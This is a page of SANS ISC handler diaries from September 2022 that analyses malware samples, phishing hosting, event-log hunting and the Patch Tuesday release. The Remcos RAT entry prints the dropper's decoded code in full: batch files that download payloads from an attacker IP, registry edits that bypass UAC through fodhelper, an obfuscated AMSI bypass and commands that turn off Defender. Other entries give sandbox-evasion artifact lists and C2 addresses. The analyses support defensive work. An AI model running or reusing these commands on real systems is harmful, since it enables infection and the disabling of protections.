Diaries

Published: 2022-09-26

Easy Python Sandbox Detection

Many malicious Python scripts implement a sandbox detection mechanism, I already wrote diaries about this[1], but it requires some extra code in the script. Because we are lazy (attackers too), why not try to automate this and easily detect the presence of such a security mechanism?

I spotted an interesting script (VT score 3/60) that uses a Python library I met for the first time: "sandboxed". It has a method to detect the presence of a sandbox easily:

from sandboxed import is_sandboxed
import sys
certainty = is_sandboxed(logging=False)
if int(certainty)>0.5:
    sys.exit()
import zlib,base64,ssl,socket,struct,time
[...]

The library project repository[2] explains the checks performed:

  • Machine specifications
  • File systems
  • Internet access

For sure, it's not bulletproof, but it could probably spot a lot of sandboxes! Note that this module focuses on Windows sandboxes, I had a look at the code, and there are only references to Windows artifacts:

_FILES = [
        r"C:\WINDOWS\system32\drivers\VBoxMouse.sys",
        r"C:\WINDOWS\system32\drivers\VBoxGuest.sys",
        r"C:\WINDOWS\system32\drivers\VBoxSF.sys",
        r"C:\WINDOWS\system32\drivers\VBoxVideo.sys",
        r"C:\WINDOWS\system32\vboxdisp.dll",
        r"C:\WINDOWS\system32\vboxhook.dll",
        r"C:\WINDOWS\system32\vboxmrxnp.dll",
        r"C:\WINDOWS\system32\vboxogl.dll",
        r"C:\WINDOWS\system32\vboxoglarrayspu.dll",
        r"C:\WINDOWS\system32\vboxoglcrutil.dll",
        r"C:\WINDOWS\system32\vboxoglerrorspu.dll",
        r"C:\WINDOWS\system32\vboxoglfeedbackspu.dll",
        r"C:\WINDOWS\system32\vboxoglpackspu.dll",
        r"C:\WINDOWS\system32\vboxoglpassthroughspu.dll",
        r"C:\WINDOWS\system32\vboxservice.exe",
        r"C:\WINDOWS\system32\vboxtray.exe",
        r"C:\WINDOWS\system32\VBoxControl.exe",
        r"C:\WINDOWS\system32\drivers\vmmouse.sys",
        r"C:\WINDOWS\system32\drivers\vmhgfs.sys",
        r"C:\WINDOWS\system32\drivers\vmusbmouse.sys",
        r"C:\WINDOWS\system32\drivers\vmkdb.sys",
        r"C:\WINDOWS\system32\drivers\vmrawdsk.sys",
        r"C:\WINDOWS\system32\drivers\vmmemctl.sys",
        r"C:\WINDOWS\system32\drivers\vm3dmp.sys",
        r"C:\WINDOWS\system32\drivers\vmci.sys",
        r"C:\WINDOWS\system32\drivers\vmsci.sys",
        r"C:\WINDOWS\system32\drivers\vmx_svga.sys"

 ]
 _PROCESSES = [
        "vboxservices.exe",
        "vboxservice.exe",
        "vboxtray.exe",
        "xenservice.exe",
        "VMSrvc.exe",
        "vemusrvc.exe",
        "VMUSrvc.exe",
        "qemu-ga.exe",
        "prl_cc.exe",
        "prl_tools.exe",
        "vmtoolsd.exe",
        "df5serv.exe",
]

[1] https://isc.sans.edu/forums/diary/Sandbox+Evasion+Using+NTP/26534
[2] https://github.com/frederikme/sandboxed

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2022-09-25

Downloading Samples From Takendown Domains

Sometimes I want to download a sample from a malicious server, but the domain name no longer resolves (it has been taken down).

In that case, I search historical DNS data for the IPv4 address of the server. And then connect to the server via its IPv4 address, like this:

That often fails, because the server is hosting many sites.

In that case, I add a Host header with the domain name:

This works regularly for me, because the domain has been taken down, but the server/file not (yet).

For TLS, we will get an error:

That's because we are using an IPv4 address in stead of a domain name.

In that case, I use option --insecure to ignore certificate errors:

When I download samples, I also use other options to go over a proxy/Tor and to log extra information, like response headers and a trace.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

1 Comments

Published: 2022-09-24

Maldoc Analysis Info On MalwareBazaar

When you lookup a malicious document sample on MalwareBazaar, like this sample, you can see analysis data from olevba and oledump.

So if you suspect that a document you received is malicious, you can look it up on or submit it to malwarebazaar, and have an initial analysis, without local tools.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-23

Kids Like Cookies, Malware Too!

Recently, a vulnerability has been disclosed by Vectra that affects Microsoft Teams[1], the very popular communication tool used daily by millions of people (me too). Security researchers found that Teams stores session tokens in clear text on the file system. I won’t discuss the vulnerability here; read the blog post if you want to learn more. The critical element is that once the token has been stolen, an attacker can impersonate the user.

At the end of the blog post, Vectra lists interesting files to watch on the file system. For the Windows operating system, there are:

%AppData%\Microsoft\Teams\Cookies
%AppData%\Microsoft\Teams\Local Storage\leveldb

After reading this, I was curious to see if this is already exploited in the wild. I created a new hunting rule on VT and crossed my fingers. After a few false positives, I got a hit! A DLL was uploaded and contained one of the two strings above.

The file was called “RwWork.dll” (SHA256:5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b). It currently has a VT score of 56/71[2]. The file looks indeed for Teams cookies but even more:

As you can see, many files related to cookies are searched. The malware is from the Floxif family...

[1] https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
[2] https://www.virustotal.com/gui/file/5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

1 Comments

Published: 2022-09-22

RAT Delivered Through FODHelper

I found a simple batch file that drops a Remcos[1] RAT through an old UAC Bypass technique. This technique is based on the "fodhelper" utility ("Features On Demand Helper"). Once launched, this tool will search for specific registry keys and, if present, will execute their content with high privileges.

The script, called "2.bat", is very simple. Note that opened into a text editor, it will display Chinese characters due to the BOM (Byte Order Mark):

remnux@remnux:/MalwareZoo/20220919$ xxd 2.bat 
00000000: fffe 2663 6c73 0d0a 4065 6368 6f20 6f66  ..&cls..@echo of
00000010: 6620 0d0a 5469 746c 6520 257e 6e30 0d0a  f ..Title %~n0..
00000020: 4d6f 6465 2036 302c 3320 0d0a 636f 6c6f  Mode 60,3 ..colo
00000030: 7220 3042 0d0a 6563 686f 280d 0a65 6368  r 0B..echo(..ech
00000040: 6f20 2020 2020 2020 2020 506c 6561 7365  o         Please
00000050: 2077 6169 742e 2e2e 2061 2077 6869 6c65   wait... a while
00000060: 204c 6f61 6469 6e67 2064 6174 6120 2e2e   Loading data ..
00000070: 2e2e 0d0a 4345 5254 5554 494c 202d 6620  ....CERTUTIL -f 

Here is the decoded script:

cls
@echo off 
Title %~n0
Mode 60,3 
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\2.bat" >nul 2>&1 
cls
"%Temp%\2.bat"
Exit
-----BEGIN CERTIFICATE-----
QGVjaG8gb2ZmDQplY2hvIFBsZWFzZSB3YWl0IDMwIHNlY29uZHM6IHdlJ3JlIGJ5
cGFzc2luZyB0aGUgQXV0aElEKEhXSUQpLiBUaGlzIHRyYXkgd2lsbCBhdXRvY2xv
c2Ugb25jZSBmaW5pc2hlZC4NCmN1cmwuZXhlIC1zIC0tb3V0cHV0ICVVU0VSUFJP
RklMRSVcTGlua3NccHVlZG8ucHMxIC0tdXJsIGh0dHA6Ly8xNzEuMjIuMzAuMTIw
L3B1ZWRvLnBzMQ0KdGltZW91dCA1ID4gbnVsDQpjdXJsLmV4ZSAtcyAtLW91dHB1
dCAlVVNFUlBST0ZJTEUlXExpbmtzXGFkaGQuYmF0IC0tdXJsIGh0dHA6Ly8xNzEu
MjIuMzAuMTIwL2FkaGQuYmF0DQp0aW1lb3V0IDUgPiBudWwNCmN1cmwuZXhlIC1z
IC0tb3V0cHV0ICVVU0VSUFJPRklMRSVcTGlua3NcbmV0LnZicyAtLXVybCBodHRw
Oi8vMTcxLjIyLjMwLjEyMC9uZXQudmJzDQp0aW1lb3V0IDUgPiBudWwNCnBvd2Vy
c2hlbGwgTmV3LUl0ZW0gLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1z
ZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQgLVZhbHVlICVVU0VSUFJPRklMRSVc
TGlua3NcYWRoZC5iYXQgLUZvcmNlDQpwb3dlcnNoZWxsIE5ldy1JdGVtUHJvcGVy
dHkgLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVs
bFxvcGVuXGNvbW1hbmQgLU5hbWUgRGVsZWdhdGVFeGVjdXRlIC1Qcm9wZXJ0eVR5
cGUgU3RyaW5nIC1Gb3JjZQ0KZm9kaGVscGVyDQpleGl0DQpEZWwgJX4wIA0KDQpE
ZWwgJX4wIA0K
-----END CERTIFICATE-----

certutil.exe (a common LOLbin) is used to decode the Base64 data present in the file, dump a new bat file and launch it. This is performed thanks to the "%~f0" which returns the full path of the batch file itself. Here is the bat file:

@echo off
echo Please wait 30 seconds: we're bypassing the AuthID(HWID). This tray will autoclose once finished.
curl.exe -s --output %USERPROFILE%\Links\puedo.ps1 --url hxxp://171[.]22[.]30[.]120/puedo.ps1
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\adhd.bat --url hxxp://171[.]22[.]30[.]120/adhd.bat
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\net.vbs --url hxxp://171[.]22[.]30[.]120/net.vbs
timeout 5 > nul
powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value %USERPROFILE%\Links\adhd.bat -Force
powershell New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
fodhelper
exit
Del %~0 

Once fodhelper is launched, it will execute adhd.bat, which uses the same technique:

cls
@echo off
Title %~n0
Mode 60,3
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\adhd - Copia.bat" >nul 2>&1
cls
"%Temp%\adhd - Copia.bat"
Exit
-----BEGIN CERTIFICATE-----
QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu
a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw
dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0
YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K
-----END CERTIFICATE-----

The decoded Base64 contains:

@echo off
echo Almost finished: it will autoruns in less than 15 seconds!
cd %USERPROFILE%\Links\
PowerShell -ExecutionPolicy Bypass -File "puedo.ps1"
echo Almost finished: it will autoruns in less than 15 seconds!
timeout 10 > nul
start net.vbs
exit
Del %~0 

The Powershell script "puedo.ps1" is responsible for downloading and executing the malware:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Set-MpPreference -DisableRealtimeMonitoring $trUE
Set-MpPreference -DisableIOAVProtection $trUE
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\"
curl.exe -s --output ("photoscreen\$env:USERNAME\Links\Zu@E.jpeg".Replace('photo','C:\').Replace('screen','Users\').Replace('Zu@E','\zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120'))
cd C:\Users\$env:USERNAME\Links
.\zoey.exe
exit

Note that the script tries to disable AMSI and Microsoft Defender. The malware is a Remcos RAT (SHA256:6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3) with the following config:

{
    "c2": [
        "171[.]22[.]30[.]7:5578"
    ],
    "attr": {
        "mutex": "asf4fas8sf48asf84as4f89huhhu99h9h-V446WS",
        "copy_file": "Isass.exe",
        "hide_file": false,
        "copy_folder": "Microsoft Updater",
        "delete_file": false,
        "keylog_file": "logs.dat",
        "keylog_flag": false,
        "audio_folder": "MicRecords",
        "install_flag": true,
        "install_path": "%ProgramFiles%",
        "keylog_crypt": false,
        "mouse_option": false,
        "connect_delay": "0",
        "keylog_folder": "remcos",
        "startup_value": "Windows Host Controller",
        "screenshot_flag": false,
        "screenshot_path": "%AppData%",
        "screenshot_time": "10",
        "connect_interval": "1",
        "hide_keylog_file": false,
        "screenshot_crypt": false,
        "audio_record_time": "5",
        "screenshot_folder": "Screenshots",
        "take_screenshot_time": "5",
        "take_screenshot_option": false
    },
    "rule": "Remcos",
    "botnet": "Papero",
    "family": "remcos"
}

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2022-09-21

Phishing Campaigns Use Free Online Resources

A phishing campaign needs some resources: bandwidth, CPU, storage, … For a very long time, a lot of phishing kits have been hosted on compromised servers. The most popular are CMS with weak configurations or outdated. I think that Wordpress is the number one in this category. By careful, it does not mean that Wordpress is a bad CMS. Most vulnerabilities are introduced through plugins. Once compromised, the phishing kit files are copied on the server and usually are reachable via the /wp-content/ or /wp-plugin/ directories.

I’m receiving daily a lot of phishing emails, via my own platform or submitted by readers and I see that there is slightly move to leave compromised servers to free online services. Internet is full of “*aaS” websites, "Something as a Service" (Forms, Storage, …). Many platforms offer a free subscription to attract customers. Most of the time, these free accounts allow attackers to upload malicious content.

Compromised CMS have issues:

  1. You need to search and compromise new servers constantly
  2. Those servers IP addresses or domains are quickly indexed in block lists
  3. If a server has been compromised once, it may be compromised again by a competitor
  4. Servers might be limited in resources (bandwidth, CPU, …)
  5. The server might be cleaned by the owner or admin (or not ;-)

At the opposite, free services have huge advantages:

  1. They can’t be easily blocked (IP & domains can be added to block lists)
  2. They offer plenty of resources, are reliable
  3. Malicious traffic might remain below the radar for a while

Let review some examples. If you need to host files (logos, scripts, ...), files.catbox.moe will be helpful:

If you search to host a form and get data delivered straight in your mailbox, formsubmit.co will be helpful:

Other services look more "technical" but can be also abused by attackers lile ipfs.io:

Here is an example of link found in the wild:

https://ipfs.io/ipfs/bafkreialspsmcfrukiforbhy4onop7yasjotzehubagyuxhw5rpcafsxmm#xavier@<domain>

(The link is gone now)

The web is full of motivated people that offer some resources for free (I remember when I was offering free Linux shells in the years 2000). Be careful, if you offer a free service, they are chances that it will be discovered and abused by attackers!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

1 Comments

Published: 2022-09-19

Chainsaw: Hunt, search, and extract event log records

Chainsaw logo

I first spotted Chainsaw courtesy of Florian Roth’s Twitter feed given that Chainsaw favors using Sigma as one of its rule engines. Chainsaw is a standalone tools that provides a simple and fast method to triage Windows event logs and identify interesting elements within the logs while applying detection logic (Sigma and Chainsaw) to detect malicious activity. Chainsaw’s powerful ‘first-response’ capability offers a generic and fast method of searching through event logs for keywords (Kornitzer & D, 2022).

The Chainsaw project documentation is robust. As always, read up on the project before use, it makes use of other great projects as well. James and Alex have provided all you need to get started in short order.

I conducted my first experiment using logs from a DFIR consulting gig I had circa 2014 with an impacted manufacturing firm. The victim user and system names have been changed to protect the innocent.
The environment was a very flat Windows environment with a .local domain that was not administered in keeping with best practices. The organization’s controllers were compromised, both the accountant and the domain ;-), leading to a significant financial loss for the organization. As such, I’ve simply changed the user name to CONTROLLER, and the domain to victimsystems.local. The related logs from this event, for purposes of this experiment, were stored in logs/client. In order to change names as described I simply wrote the results to a text file when running Chainsaw as follows:

chainsaw hunt logs/client/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml > results\results.txt

I also ran Chainsaw this way when I discovered that results written to the console are more comprehensive than those written out to CSV with the --csv --output results option. This run exclusively used Sigma rules as noted via -s Sigma.

Chainsaw

Figure 1: First Chainsaw experiment

The results were revealing, and in keeping with my original investigation eight years ago. The victim system was thoroughly infested with malware, amongst which I’d identified Trojan.Agent.FSAVXGen, also known as Backdoor:Win32/Simda, a backdoor usually dropped by other malware or downloaded users visiting malicious sites. Chainsaw’s results revealed this malware in the victim system security log with Sigma’s Failed Code Integrity Checks and Remote Service Creation as seen in Figure 2.

Results

Figure 2: Chainsaw reveals Backdoor:Win32/Simda

Note the kernel mode driver, and a service named xina.exe, but the real IOC is the failed code integrity check for l3codeca.acm, a common indicator for this malware.

My second experiment included the use of Florian’s APT Simulator on one of my Windows systems. APTSimulator is exactly what it says it is, delivered via is a Windows batch script that uses a set of tools and output files to make a system look as if it was compromised (Roth, 2022).
I chose to run every option, which is complete overkill, but fun nonetheless. I then saved the system’s security event log as APTsim.evtx and ran it through Chainsaw as follows:

chainsaw hunt logs/APTsim.evtx -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/ > results\APTsimResults.txt

Note that this Chainsaw run included -r rules, which incorporates Chainsaw’s built-in rule set as well. From th APTsim.evtx assessment, Chainsaw rules identified Account Tampering (APT Simulator added an admin to the local administrator’s group), while Sigma rules flagged Generic Password Dumper Activity on LSASS (procdump64.exe), Remote Service Creation (PSEXESVC.EXE), and Rare Schtasks Creations (falshupdate22).

Results

Figure 3: Chainsaw identifies APT Simulator behaviors

This is an extremely useful tool when you need a fast way to hunt in Windows event logs with all the benefits of Sigma and speed. I really enjoyed the opportunity to experiment with Chainsaw, appreciate the project leads for their work, as well as the excellent dependencies Chainsaw takes in Sigma, the EVTX parser, and the TAU Engine. Great stuff all around. In the name of my favorite deathcore band, Whitechapel, “the saw is the law”!

Cheers…until next time.

Russ McRee | @holisticinfosec

 

References: Countercept, (2022, August). Rapidly Search and Hunt through Windows Event Logs. Github. Retrieved September 15, 2022, from https://github.com/WithSecureLabs/chainsaw

Roth, F. (2022, June 20). NextronSystems/APTSimulator: A toolset to make a system look as if it was the victim of an apt attack. GitHub. Retrieved September 18, 2022, from https://github.com/NextronSystems/APTSimulator

0 Comments

Published: 2022-09-18

Preventing ISO Malware

In the last few weeks, I’ve seen a significant uptick in systems infected with Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things. 

  

Initial infection 

 The user went to the malicious search results, where the query they searched for presented an ISO file for their search terms. Below is the results of a user that got infected 

https://alizebruisiacult[.]xyz/?cms=Mzg1ODEEDwwMCAYNDQwCAQsCDNDEDgcCDwwPAQAASQ%3D%3D&fn=Stroud%20-%20Advanced%20Engineering%20Mathematics%204e&extt=xpectthatmy.shop%2F%3Ftid%3D952736

 

C:\Users\user\Downloads\Stroud - Advanced Engineering Mathematics 4e.iso 

 

This ISO file contained the following files

files.zip

res.ico

Install.lnk

properties.bat

 

The user double clicked on the Properties.bat file that started the infection process.

Parent Process Name: cmd.exe

Parent Process Command Line: cmd.exe /c ""D:\properties.bat" "

Process Name: tar.exe

Process Command Line arguments: tar -xvf "files.zip" -C "C:\Users\user\AppData\Roaming"

They established persistence with CurrentVersion\Run key.

"opensubtitles-uploader.exe "k2eN"" /f. 

HKEY_CURRENT_USER\S-1-5-21-740110469-27406-3214746-20027\SOFTWARE\Microsoft\Windows\CurrentVersion\

C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe.

Connection to some malicious domains from happened from opensubtitles-uploader.exe.

C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe.

https://alizebruisiacult[.]xyz

https://raw.githubusercontent[.]com

 

Since the infection is coming from a user mounting and executing files in an ISO, the best way to stop this is to prevent a user from mounting the ISO by double clicking. Users are still able to Burn a CD from within windows if needed. If you have power users that need to open ISOs they can use compression utilities.  

 

Mubix (Rob Fuller) has a great article about how to disable this.(1).  Below, there are two different options to prevent users from double clicking ISO file to mount them.  The GPO method is a little more complete in protections, see the article for more details. We have deployed this in my environment to end users' desktops and have not had any issues to this point nor any new infections via this method.

 

GPO 

Computer config -> Admin Templates -> System -> Device Installation Restrictions ->  

  • Allow administrators to override Device Installation Restrictions Policies (enabled) 
  • Prevent Installation from devices that match any of these device IDs 

 Add this exact ID    

  • SCSI\CdRomMsft____Virtual_DVD-ROM_ 

 

Registry Setting 

  • HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount 
  • Value “ProgrammaticAccessOnly” as REG_SZ 
     

(1) https://malicious.link/post/2022/blocking-iso-mounting/ 


If you have done this or something similar, let us know. 

--

Tom Webb

@twsecblog

0 Comments

Published: 2022-09-18

Video: Grep & Tail -f With Notepad++

This is a video for diary entry "Quickie: Grep & Tail -f With Notepad++".

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-17

Video: Analyzing Obfuscated VBS with CyberChef

Here is a video for my diary entry "Analyzing Obfuscated VBS with CyberChef".

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-16

Word Maldoc With CustomXML and Renamed VBAProject.bin

Friend and colleague 0xThiebaut just gave me a heads up for this interesting sample: 2056b52f8c2f62e222107e6fb6ca82708cdae73a91671d40e61aef8698e3e139

This is what we get with oledump.py:

As there seems to be quite a lot of VBA code, I use plugin plugin_vba_dco to give me a summary:

I notice the CustomXMLParts, and I take a look with zipdump.py (because this is an OOXML file):

Taking a look at the content of customXml/item1.xml:

And I see a MZ header (4d5a), so this must be a PE file. Let's extract it with base64dump.py:

And this is the embedded payload: 766fb7ca50d63897e7bb3a5c9659e2fd (IcedID).

There's more interesting things to notice about this sample. One of them is that the VBA project file (ole file) is named FIzzyWAbnj.bin in stead of the usual VBAProject.bin.

And some tampering:

There's maybe more to discover, but I'm on holiday :-)

 

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-15

Malicious Word Document with a Frameset

This is definitively new, but I did not see this type of document for a while. I spotted a malicious Word OOXML document (the new ".docx" format) that is a simple downloader. Usually, malicious documents contain an embedded file, a VBA macro, or the recent vulnerability MS-MSDT[1]. This time, the document does not contain any malicious code but just refers to a second stage that will be delivered when the document is opened.

OOXML Microsoft documents support HTML elements such as... framesets! Think about an iframe in an HTML document; we have a similar capability to place text in some places in a document. This feature is not visible by default in Word, but you can enable the feature and create them using Word[2]. Because OOXML documents are ZIP archives, they can be tweaked to implement a frameset and make it point to another payload. 

The document I spotted uses this technique. It was delivered via a phishing campaign and called "Order Confirmation 22839.docx" (SHA256:2382d4957569aed12896aa8ca2cc9d2698217e53c9ab5d52799e4ea0920aa9b9). In the ZIP archive, let's have a look at the "webSettings.xml" file:

remnux@remnux:/MalwareZoo/20220915$ zipdump.py Order\ Confirmation\ 22839.docx
Index Filename                        Encrypted Timestamp           
    1 [Content_Types].xml                     0 1980-01-01 00:00:00 
    2 _rels/.rels                             0 1980-01-01 00:00:00 
    3 word/_rels/document.xml.rels            0 1980-01-01 00:00:00 
    4 word/document.xml                       0 1980-01-01 00:00:00 
    5 word/theme/theme1.xml                   0 1980-01-01 00:00:00 
    6 word/settings.xml                       0 1980-01-01 00:00:00 
    7 word/fontTable.xml                      0 1980-01-01 00:00:00 
    8 word/_rels/webSettings.xml.rels         0 2022-09-14 11:02:52 
    9 docProps/app.xml                        0 1980-01-01 00:00:00 
   10 word/styles.xml                         0 1980-01-01 00:00:00 
   11 docProps/core.xml                       0 1980-01-01 00:00:00 
   12 word/webSettings.xml                    0 1980-01-01 00:00:00 
remnux@remnux:/MalwareZoo/20220915$ zipdump.py Order\ Confirmation\ 22839.docx -s 12 -d | xmldump.py pretty
<?xml version="1.0" ?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
    <w:frameset>
        <w:framesetSplitbar>
            <w:w w:val="60"/>
            <w:color w:val="auto"/>
            <w:noBorder/>
        </w:framesetSplitbar>
        <w:frameset>
            <w:frame>
                <w:name w:val="1"/>
                <w:sourceFileName r:id="rId1"/>
                <w:linkedToFile/>
            </w:frame>
        </w:frameset>
    </w:frameset>
    <w:optimizeForBrowser/>
    <w:allowPNG/>
</w:webSettings>

We have indeed a frameset that is referenced by id 'rId1'. References are defined in ".rels" files:

remnux@remnux:/MalwareZoo/20220915$ zipdump.py Order\ Confirmation\ 22839.docx -s 8 -d|xmldump.py pretty
<?xml version="1.0" ?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Target="http://1806445755/...--------------.....----------------............----------------/....92.doc" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"/>
</Relationships>

Note that the payload will be automatically downloaded with interaction with the user. Just a popup will be displayed:

The payload ("92.doc") is a classic malicious RTF document (SHA256:dd1a1537774ef9680ff376a4baed81c90b11a521ef4c69ffd23edfa59eaa1300). It downloads the real malware from the following URL:

hxxp://107[.]172[.]44[.]187/92/vbc.exe

The malware is a Redline stealer[3] (SHA256:7d2b174c017d61fcd94673c55f730821fbc30d7cf03fb493563a122d73466aab) talking to the following C2 server:

171[.]22[.]30[.]129:54686

[1] https://isc.sans.edu/diary/New+Microsoft+Office+Attack+Vector+via+%22ms-msdt%22+Protocol+Scheme+%28CVE-2022-30190%29/28694
[2] https://www.extendoffice.com/documents/word/733-word-insert-frame.html
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2022-09-14

Easy Process Injection within Python

Process injection is a common technique used by malware to cover their tracks. What looks more legit than a process called "notepad.exe" or "explorer.exe"? They are multiple ways to perform process injection, one of them is called "Process Hollowing" (T1055/012/)[1]. When I'm teaching FOR610, students are often surprised that it's a feature of the operating system, so, by default, not malicious. Microsoft offers all the required API calls to perform this. Some legit applications use many process injection techniques like your best antivirus or EDR solution!

I've been keeping an eye on malicious Python scripts for a while and have already discovered many. Python can call any Microsoft API and perform process injection using the classic VirtualAlloc(), CreateRemoteThreat(), etc. I already mentioned some of them in previous diaries[2].

But Python has a huge ecosystem with plenty of third-party libraries that helps to write powerful scripts[3]. I found an interesting small script that uses the PyMem library[4]. On the website, it is described as :

A python library to manipulate Windows processes (32 and 64 bits). With PyMem you can hack into windows processes and manipulate memory (read/write).

The script was found on VT and has a score of 21/60[5] (SHA256:0cba55d0ec134624c15489a6605231fa1176536dd2cbb3ef1df69fc6b0dca13d). It uses the PyMon library to inject a payload into another process:

After checking deeper, the shell code disclosed a PoC. The code implements a backdoor connecting back to an RFC1918 address on port 4444. Seems to be a RedTeam exercise in preparation!

However, this script demonstrates how easily you can perform process injection in Python scripts! Even more interesting, you don't need skills to generate a real shellcode. You can inject a Python interpreter into the target process and run any Python code using:

pm.inject_python_interpreter()

Stay safe!

[1] https://attack.mitre.org/techniques/T1055/012/
[2] https://isc.sans.edu/diary/Python+Shellcode+Injection+From+JSON+Data/28118
[3] https://isc.sans.edu/diary/Keeping+an+Eye+on+Dangerous+Python+Modules/27514
[4] https://pypi.org/project/Pymem/
[5] https://www.virustotal.com/gui/file/0cba55d0ec134624c15489a6605231fa1176536dd2cbb3ef1df69fc6b0dca13d/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2022-09-13

Microsoft September 2022 Patch Tuesday

This month we got patches for 79 vulnerabilities. Of these, 5 are critical, 2 were previously disclosed, and 1 is already being exploited, according to Microsoft.

The exploited vulnerability is an elevation of privilege in Windows Common Log File System Driver (CVE-2022-37969). According to the exploit, an attacker who successfully exploited this vulnerability could gain SYSTEM privileges. The attack vector is local, and requires no user interaction. The CVSS for this vulnerability is 7.8.

Amongst critical vulnerabilities, there is a Remote Code Execution (RCE) affecting Windows Internet Key Exchange (IKE) Protocol Extensions (CVE-2022-34721). An unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation. Although this vulnerability affects just IKEv1, all Windows Servers versions are affected as V1, and V2 packets are accepted. The attack vector is ‘network’, no user interaction and privileges are required, and the attack complexity is low. This vulnerability brings together the characteristics of a wormable vulnerability that you should give attention to and apply the patch as soon as possible. The CVSS for this vulnerability is 9.80.

Another critical vulnerability is an RCE affecting Windows TCP/IP (CVE-2022-34718). An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPSec is enabled, which could enable a remote code execution exploitation on that machine. Only systems with the IPSec service running are vulnerable to this attack. As the previous one, this vulnerability brings together the characteristics of a wormable vulnerability. The CVSS for this vulnerability is 9.80 as well. 

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com/

September 2022 Security Updates

Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
.NET Core and Visual Studio Denial of Service Vulnerability
%%cve:2022-38013%% No No Less Likely Less Likely Important 7.5 6.5
.NET Framework Remote Code Execution Vulnerability
%%cve:2022-26929%% No No Less Likely Less Likely Important 7.8 6.8
AV1 Video Extension Remote Code Execution Vulnerability
%%cve:2022-38019%% No No Less Likely Less Likely Important 7.8 6.8
Arm: CVE-2022-23960 Cache Speculation Restriction Vulnerability
%%cve:2022-23960%% Yes No Less Likely Less Likely Important    
Azure Guest Configuration and Azure Arc-enabled servers Elevation of Privilege Vulnerability
